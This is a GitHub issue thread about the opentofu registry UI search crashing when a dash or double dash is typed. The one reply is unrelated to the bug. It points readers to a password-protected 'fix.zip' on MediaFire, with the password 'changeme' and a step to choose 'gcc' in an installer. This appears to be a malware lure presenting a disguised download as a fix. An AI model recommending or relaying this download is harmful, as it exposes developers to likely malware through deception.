### ISSUE TITLE
Dash `-` crashes the search 

### ISSUE THREAD

**Issue by dnaploszek** [opentofu/registry-ui#81]
When I type either `-` (without anything else), or `--` (after something else for example `test--`). The page crashes showing this screen:
![image](https://github.com/user-attachments/assets/a3915b70-1ae4-4071-8e02-8bda8df95c2d)

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
